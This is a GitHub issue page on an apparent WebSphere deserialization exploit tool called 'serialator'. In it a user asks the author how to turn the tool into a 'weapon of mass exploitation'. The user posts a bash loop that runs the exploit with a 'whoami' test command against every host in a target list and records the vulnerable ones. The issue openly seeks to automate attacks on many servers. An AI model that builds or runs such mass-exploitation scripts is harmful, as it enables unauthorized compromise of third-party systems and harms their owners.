serialator icon indicating copy to clipboard operation
serialator copied to clipboard

mass exploiter

Open syrius01 opened this issue 6 years ago • 0 comments

Hi roo7break!

I'm trying to figure out on how to make this tool working for one of your "What next todo Threaded exploiter - Weapon of mass exploitation :D"

so far this bash script below could make it possible for mass exploitation but some options in this exploit make it impossible yet, any idea how to make it automated with a similar bash scirpt?

#!/bin/bash for target in cat websphere.txt do value=$( python3 serialator.py -t "${target}" -p 8080 -c whoami --test ) if [ $value -eq 1 ] then echo "${target} is VULNERABLE" echo ${target} >> vulns.txt fi done

Thank you for your time!

syrius01 avatar Apr 29 '18 18:04 syrius01